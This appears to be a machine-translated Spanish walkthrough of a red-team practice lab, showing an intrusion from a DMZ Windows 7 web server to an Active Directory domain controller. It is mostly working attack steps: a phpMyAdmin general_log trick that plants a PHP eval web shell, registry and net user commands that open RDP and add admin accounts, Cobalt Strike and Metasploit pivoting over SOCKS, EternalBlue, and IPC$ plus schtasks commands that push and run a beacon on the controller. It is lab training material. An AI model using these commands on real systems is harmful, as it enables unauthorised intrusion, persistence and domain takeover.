Tabla de contenido
1. Penetración de intranet en el campo de tiro del equipo rojo
1. Descarga de la herramienta Target Drone
2. Diagrama de topología de red de este experimento
3. Proceso de ataque de penetración de intranet
2. Zona de oficinas de intranet
1. Penetración de Win7 en el área DMZ
1.1 Recopilación de información:
1.3 El principio del sitio web remoto
2. Penetración del área de la oficina de la intranet (host en el dominio)
2.3 Construye un túnel de calcetines
3. Penetración del entorno de dominio (controlador de dominio)
3.1 El concepto de entorno de dominio
3.4 Conectarse a través de CS sin conectarse
3.5 Establecer una conexión de comunicación entre procesos IPC
1. Penetración de intranet en el campo de tiro del equipo rojo
1. Descarga de la herramienta Target Drone
Enlace: https://pan.baidu.com/s/1LgWAHK3XP2Q9CG6QVdxuw
Código de extracción: beso
Contraseña de inicio de sesión de la máquina virtual Win7: hongrisec@2019
2. Diagrama de topología de red de este experimento
Para lograr la penetración de la intranet en este experimento, no podemos infiltrarnos directamente en el servidor de la intranet y el área de la oficina de la intranet, porque la red no está conectada.
Podemos infiltrarnos a través de las computadoras en el área de DMZ. Las computadoras en el área de DMZ tendrán una cierta conexión con el área de oficinas de intranet. Podemos usar las computadoras en el área de DMZ como trampolín para conectarnos al área de oficinas de intranet usando tecnología de túnel. (DNS ICMP SOCKS HTTP SSH), y el área de la oficina tiene cierta conexión con el área del servidor, para que luego podamos ingresar a la intranet.
Una computadora win7 en el área DMZ
Una computadora win2003 en el área de la oficina de intranet
servidor de intranet una computadora win2008
Necesitamos aviones de ataque kali namp ant espada y otras herramientas
3. Proceso de ataque de penetración de intranet
Recopilación de información: IP nombre de dominio subdominio nombre directorio CDN marco de lenguaje whois estructura de arquitectura de buzón
Explotación de vulnerabilidades: Común: SQL XSS XXE CSRF rce carga Middleware: puntales de resorte fastjon vulnerabilidades históricas. . .
Escalada de privilegios: Escalada de privilegios a privilegios de administrador raíz
Mantenimiento de la autoridad: se instala una puerta trasera en el objetivo, el propósito es garantizar que la autoridad no se pierda y que el objetivo haya sido controlado.
Proxy de intranet: cree un proxy o túnel para detectar y acceder a máquinas en la intranet.
Recopilación de intranet: recopilación de información de máquinas locales, recopilación de información dentro del dominio, robo de credenciales de inicio de sesión, detección de host sobreviviente, escaneo de puertos de intranet.
Vulnerabilidad de intranet: utilice herramientas (MSF Nessus nmap) para obtener información de vulnerabilidad relevante del host
Movimiento lateral: el atacante obtiene acceso a la red interna, amplía la autoridad a través de escaneo, voladura, transferencia smb y otras tecnologías, y se mueve en el entorno de red comprometido.
Ataque entre dominios: método de penetración convencional (usando vulnerabilidades web para obtener permisos entre dominios) usando valores de hash de dominio conocidos para realizar ataques de hash pass o ataques de tickets
Limpieza de seguimiento: borre registros del sistema, omita registros y borre seguimientos de operaciones.
2. Construcción del entorno
1. Win7 en el área DMZ
máquina virtual win7
Esta máquina virtual actúa como un servidor web y requiere tarjetas de red duales, que son 192.168.52.143 y 192.168.111.128 respectivamente
Vm3 192.168.52.0 sirve como segmento de red de intranet
Vm4 192.168.111.0 sirve como segmento de red pública
Abra la máquina virtual win7, configúrela, agregue una tarjeta de red, ajústela a la personalizada, VMnet3 y VMnet4.
Inicie la máquina virtual win7, encienda la adaptación de red, conexión local: la primera tarjeta de red
Conexión de área local 4: segunda NIC
Abre el entorno de phpstudy
2. Zona de oficinas de intranet
win2k3, configure la red vm3, la ip está configurada en 192.168.52.141
Win7 ping win2k3 puede hacer ping para demostrar que el entorno no es un problema
La máquina de ataque kali necesita una tarjeta de red dual vm4 como red pública (192.168.111.xxx)
Debido a que esta configuración, Kali puede acceder a Win7 en la DMZ, y luego Win7 tiene una cierta conexión con la intranet, que puede infiltrarse aún más.
Kali hace ping a win7 192.168.111.128 para demostrar que la configuración del entorno es exitosa
3. Host de control de dominio
ganar 2008 tarjeta de red VM3 (192.168.52.xxx)
La IP está configurada como 192.168.52.138
win7 hacer ping a win2008
Inicio de sesión de Win7 con el usuario de dominio DIOS
ping dios.org
usuario de red/dominio
Si usa el usuario stu1, no puede encontrar el dominio usuario net usuario / dominio, debe verificarlo debajo del usuario dios
3. Comienza el ataque
1. Penetración de Win7 en el área DMZ
Propósito: controlar esta computadora a través del escritorio remoto.
1.1 Recopilación de información:
1.ip puerto directorio sitio web desarrollo idioma whois correo electrónico teléfono móvil empresa estructura subdominio. . .
Conozca la dirección IP:
1. Puerto de escaneo (namp)
Barrer algunos puertos
Visita puerto 80
La sonda phpStudy ha realizado algunos cambios sobre la base del phpinfo original. En el proceso de desarrollo, a menudo necesitamos varias configuraciones del servidor, y se utilizan "sondeos" para detectar configuraciones.
Descubrir servicios web (dirsearch Imperial Sword...)
1. Escanear directorio
2. Escanear fondo
Visitamos beifen.rar para descargar el archivo.
página phpinfo.php
página phpmyadmin
Utilice la herramienta de voladura phpmyadmin para copiar primero el sitio web en el archivo txt.
Importe el archivo txt ahora mismo y comience a explotar:
El nombre de usuario y la contraseña son root, ingrese a la página
1.2 Información recopilada
1. Se encuentra que el puerto 80 es una sonda, y parece que no hay forma de usarlo.
2. Descubrí que el sistema web tiene un archivo beifen.rar
3. Encontré que el sistema web tiene una página phpinfo
4. Encontré que el sistema web tiene una página phpmyadmin (interfaz de administración de base de datos)
1.3 El principio del sitio web remoto
1. Es necesario escribir un caballo de Troya en el archivo del servidor ( una oración de un caballo grande y un caballo pequeño, un caballo de Troya, un caballo de memoria, un caballo libre de matar a un caballo, etc. )
2.< ?php evaluación($_POST[1]); ?>
3. ¿Cómo escribirlo? Vulnerabilidad del marco de carga de archivos de inyección SQL . . . . Fue escrito a través de una laguna.
Trucos getshell de Phpmyadmin
- Encontré que la contraseña de phpmyadmin es root/root
shell de phpMyAdmin
general_log está desactivado por defecto Actívelo para registrar cada comando ingresado por el usuario y guárdelo en el archivo de registro correspondiente. Puede intentar personalizar el archivo de registro y escribir contenido en el archivo de registro, luego puede obtener shell con éxito:
# Ver la configuración actual
SHOW VARIABLES LIKE 'general%';
Ejecute la sentencia en SQL:
El registro se guarda en el directorio C:\phpStudy\MySQL\data\stu1.log
# Cambiar la ubicación del archivo de registro
establecer general_log global = "ON";
set global general_log_file='C:/phpStudy/WWW/l.php';
Nuestra ruta es la ruta de la sonda phpstudy, por lo que el registro se escribe en la ruta de la sonda y podemos cargar el caballo de Troya para atacar
Ver la configuración la próxima vez
# Escribir carga útil en el registro
select '<?php eval($_POST[1]); ?>';
Eche un vistazo a la página de la sonda y busque en la parte inferior:
Conexión espada hormiga:
Ingrese ip, la contraseña de conexión es un caballo de Troya que escribimos 1
Abra una terminal virtual, ingrese whoami para ver la ipconfig del usuario ver ip
Queremos iniciar sesión en el escritorio de forma remota, así que asegúrese de que el puerto 3389 esté abierto, el comando es el siguiente:
- abierto 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
usuario de red ver usuarios
La conexión remota 192.168.111.128 encontró que se requiere una contraseña
Tenemos dos métodos: 1. Cambiar contraseña de usuario 2. Agregar un nuevo usuario
net user administrator admin@123 #更改密码
net user administrator /active:yes #激活密码
net user username password /add #新建用户
se encontró conectado todo el tiempo,
Aparece esta página,
haga clic en sí
Se encuentra que hay verificación de conexión remota en la máquina virtual win7
Apagamos y reiniciamos la computadora en Ant Sword:
apagar -r -t 0
Conexión remota al encender ¡Conexión exitosa! ! !
Resumir:
El primer dron objetivo fue derribado, y aquí utilizamos la recopilación de información y la explotación de vulnerabilidades.
Recopilación de información: el puerto abierto se escaneó a través de la ip y encontramos la sonda phpstudy en la página phpmyadmin a través del puerto.
Explotación de vulnerabilidades: use getshell para escribir un caballo de Troya de una oración en la página de phpmyadmin, conéctese con Ant Sword, cree un usuario o cambie la contraseña para la conexión de escritorio remoto y apague la computadora en el área DMZ.
2. Penetración del área de la oficina de la intranet (host en el dominio)
Queremos ingresar a la intranet, si ingresamos directamente, no funcionará, la red no está en el mismo segmento, por lo que necesitamos usar win7 como trampolín para ingresar al host de dominio win2003
Definitivamente es imposible hacer ping a win2003 desde esta máquina
Ant espada win7 ping a través de win2k3 demuestra que la configuración está bien
Después de obtener el shell web, por lo general, la máquina se conectará a cs y msf (después de la infiltración)
MSF es la línea de comandos CS es la interfaz gráfica de MSF
MSF CS (porque estas dos herramientas integran la escalada de privilegios con un solo clic para abrir un proxy para escanear túneles, etc.)
Agregue una tarjeta de red vm4 (192.168.111.130) a kali
Kali ping win7 (192.168.111.128) demuestra que el entorno está bien
2.1 Ir en línea a CS
1. Ejecute el servidor bash teamserver kali ip (192.168.111.130) contraseña (123456) en kali
2. Ejecute el cliente bash cobaltstrike.sh
ip es kali ip post es el puerto 9081 del servidor que se esta ejecutando, la contraseña es 123456
3. Produce un oyente
agregue agregue un nombre a cualquier puerto y escriba uno poco común.
El troyano se conecta al oyente, y el oyente regresa al servidor, y el contenido del servidor está en esta página.
4. Generar un troyano
Conectar con el beso del oyente
Guárdelo en el escritorio, asígnele un nombre
5. Sube MSB.exe a win7 con Ant Sword
dir ver MSB.exe ejecutar
Regrese a kali y conéctese en línea con éxito
El sueño de la sesión se cambia a 1, y la respuesta es de 1 segundo
ingrese la línea de comando
Ver shell de comando whoami ipconfig
Ver impresión de ruta de shell de enrutamiento
Ver arp, dirección ip de intranet encontrar ip de destino
Se debe hacer ping a ping192.168.52.141 (win2k3)
2.2 Puerto de escucha MSF
CS agrega un monitor msf
Engendro enviado a msf
¡Se descubrió que el ataque meterpreter fue exitoso! ! ! De esta manera, msf también penetró en win7
2.3 Construye un túnel de calcetines
Haga clic con el botón derecho en el servidor Rivoting Socks
configurar el puerto 34456 (puerto)
Túnel abierto con éxito
Ver información del túnel
Haga clic en Túnel para generar código
copiar enlace de código
setg Proxies socks4:192.168.111.130:34456
Devoluciones de fondo en msf
Establezca el túnel msf en 192.168.111.130, el puerto es 34456
Ahora nuestro msf puede jugar intranet
Compruebe win2k3 para la vulnerabilidad de Eternal Blue
El número de serie 3 corresponde a comprobar si existe una vulnerabilidad de Eternal Blue
use 3 #使用序号3
show options #查看配置内容
set rhosts 192.168.52.141 #设置目标地址
run #运行
Descubrí que hay una vulnerabilidad azul eterna en win 2003
Usamos 0 ms17_eternablue para encontrar que el sistema puede ser demasiado antiguo si no puede funcionar
Pero podemos aprovechar el uso de 2 cmd
ver whoami
Ver dirección IP ipconfig
Resumir:
1. Conéctese en línea al CS y MSF del host del controlador de dominio
2. Cree un proxy de calcetines
3. A través del agente de conexión MSF para controlar el host de la intranet 2003
3. Penetración del entorno de dominio (controlador de dominio)
3.1 El concepto de entorno de dominio
nombre de la computadora win7 y dominio del grupo de trabajo
Utilizo la escuela corporativa para introducir la comprensión de los grupos de trabajo y los dominios.
Grupo de trabajo: agrupe las computadoras en grupos para facilitar la administración por parte de los administradores.
Por ejemplo, una empresa tiene 100 personas (100 computadoras) La empresa tiene varios departamentos, como el Departamento de Recursos Humanos, el Departamento de Operación y Mantenimiento, el Departamento de Finanzas, el Departamento de TI, etc.
¿Cuáles son las desventajas de esto? ? ?
No hay disciplina ni mecanismo de gestión unificado.
Por ejemplo, la pequeña K trabaja en el departamento de TI, y mi jovencita favorita está en el departamento de personal. Mañana, la pequeña K irá directamente a trabajar en el departamento de personal.
El gerente pidió a todos los empleados que reemplazaran sus computadoras con fondos de pantalla de cultura corporativa para que no pudieran tener el software A, pero Xiao K no lo escuchó, sino que en lugar de cambiar el fondo de pantalla, descargó el software A.
De esta forma surge el concepto de dominio.
Únase al administrador de red en el dominio (similar al profesor de la clase de estudiante): el rol de administración unificada (controlador de dominio)
Máquina intradominio: como empleados (estudiantes)
En una computadora, el administrador de red permite que los empleados usen el fondo de pantalla que deseen, les permite usar cualquier software que tengan, les permite apagar cuando lo deseen y establece contraseñas para una administración unificada, etc.
Grado 1 Clase 1 (Clase Rocket: Nombre de dominio)
Profesor principal (líder): controlador de dominio
Estudiantes: máquinas en el dominio
Nota: una computadora solo puede unirse a un dominio. Por ejemplo, un estudiante solo puede unirse a una clase.
Puede haber varios controladores de dominio en un dominio. Por ejemplo, una clase tiene más de un director y un maestro.
Muy importante
Usuarios locales (pueblos indígenas): usuarios locales (las cuentas y contraseñas se almacenan en máquinas locales)
Usuario de dominio: es el usuario que se une al dominio (es decir, la cuenta y la contraseña se almacenan en el controlador de dominio). Generalmente, la empresa agrega el dominio y el hogar personal no agrega el dominio.
Encuentra un controlador de dominio Cómo ver si hay un dominio
¿Cómo unirse al dominio? ? ?
El DNS de la computadora host primero selecciona la ip del servidor de dominio, luego completa el nombre de dominio que se unirá en las propiedades de la computadora, ingresa la contraseña de la cuenta del servidor de dominio y finalmente se une al dominio.
Un servidor de dominio puede agregar un usuario para establecer una contraseña para iniciar sesión en la computadora host.
host win7DMZ
Dios\administrador usuario de control de dominio
Stu1\usuario local administrador
3.2 Determinar el dominio
Shell whoami en kali comprueba que el usuario es dios. En este momento, no sabemos si es un usuario de control de dominio. En este momento, usamos
shell hostname Verifique el nombre de la computadora y devuelva stu1 Si es un usuario local, debe ser stu1\xxx, así que supongo que dios es un usuario de control de dominio.
O bien, el método más directo y simple shell ipconfig/all puede ver claramente que el nombre de host stu1 dns sufijo es god.org
3.3 Recopilación de información dentro del dominio
¿Dónde está el controlador de dominio de consulta?
nslookup -type=SRV _ldap._tcp
Ver la ip del controlador de dominio 192.168.52.138 (win2008) nombre del controlador de dominio owa dirección de nombre de dominio god.org
Consultar cuantos usuarios hay en el dominio
net user /domain
Estos usuarios están todos en el controlador de dominio
Consultar cuantos equipos hay en el dominio
net group "domain computers" /domain
stu1 es la computadora que controlamos
Consultar el nombre del controlador de dominio
net group "Domain Controllers" /domain
OWA
3.4 Conectarse a través de CS sin conectarse
generar un oyente
Generar archivos troyanos
Se genera un caballo de Troya (un caballo de Troya que puede conectarse pero no conectarse)
¿Cómo se transmite el caballo de Troya al controlador de dominio? ? ?
Ver contraseña de administrador del controlador de dominio
3.5 Establecer una conexión de comunicación entre procesos IPC
La IP y la contraseña son de control de dominio win2008
shell net use \\192.168.52.138\ipc$ "GODl123" /user:god\administrator
shell net use #查看连接
Ahora se ha establecido una conexión con el controlador de dominio, lo que demuestra que confían el uno en el otro y pueden transferir archivos.
Échale un vistazo
Copie el archivo en la computadora del controlador de dominio
copy beacon.exe \\192.168.52.138\c$
host de control de dominio win2008
Crear una tarea programada remota
schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f
correr
schtasks /run /s 192.168.52.138 /i /tn "test"
conectar
connect(link)目标ip 192.168.52.138
Ver controlador de dominio whoami ipconfig
Verifique la contraseña (porque mi controlador de dominio win2008 y springboard win7 establecieron la misma contraseña)
Comando para ver las contraseñas de inicio de sesión
Degradar el sistema a administrador
shell schtasks /create /s 192.168.52.138 /tn test1 /sc onstart /tr c:\beacon.exe /ru administrator /f #创建 目标ip 文件名test 木马beacon.exe 用户administrator
shell schtasks /run /s 192.168.52.138 /i /tn "test1" #运行
connect(link) 192.168.52.138
3.6 Movimiento lateral
De hecho, cs integra la conexión con un solo clic.
Conexión con un clic al controlador de dominio en el dominio
.138 es controlador de dominio
De esta manera, ir directamente al controlador de dominio
El host del controlador de dominio controla los hosts en el dominio
Queremos estar en línea win2k3 192.168.52.141
Éxito en línea win2003
Resumir:
1. Identificar usuarios de dominio y usuarios locales, y recopilar información en el dominio.
2. Use CS para conectarse sin conectarse, generar caballos de Troya, verificar contraseñas de dominio y establecer conexiones de comunicación IPC.
3. Movimiento horizontal, penetración mutua entre el host del controlador de dominio y el host del dominio.